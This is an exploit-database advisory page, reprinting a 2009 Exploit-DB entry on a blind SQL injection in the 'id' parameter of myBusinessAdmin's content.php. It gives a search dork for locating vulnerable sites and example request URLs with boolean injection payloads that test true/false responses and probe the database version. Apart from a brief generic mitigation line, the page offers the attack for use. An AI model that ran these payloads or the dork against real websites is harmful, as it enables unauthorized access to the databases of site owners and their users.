myBusinessAdmin (content.php) Blind Sql Injection Vulnerability

vendor:

myBusinessAdmin

by:

AtT4CKxT3rR0r1ST

8,8

CVSS

HIGH

Blind Sql Injection

CWE

Product Name: myBusinessAdmin

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

myBusinessAdmin (content.php) Blind Sql Injection Vulnerability

myBusinessAdmin is vulnerable to Blind Sql Injection. An attacker can inject malicious SQL queries into the vulnerable parameter 'id' of the content.php page. This can be exploited to gain access to sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

myBusinessAdmin (content.php) Blind Sql Injection Vulnerability
==============================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Team           : Sec Attack Team
.:. Home           : www.sec-attack.com/vb
.:. Script         : myBusinessAdmin
.:. Download Script: http://www.redcow.ca/products/mybusinessadmin/
.:. Bug Type       : Blind Sql Injection
.:. Dork           : "Powered by myBusinessAdmin and Red Cow Technologies, Inc."

####################################################################

===[ Exploit ]===

www.site.com/content.php?id=[Blind SQL INJECTION]


www.site.com/content.php?id=NULL+and+1=1       >>> True
www.site.com/content.php?id=NULL+and+1=2       >>> False


www.site.com/content.php?id=NULL+and+substring(@@version,1,1)=5  >>> True
www.site.com/content.php?id=NULL+and+substring(@@version,1,1)=4  >>> False



####################################################################

Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack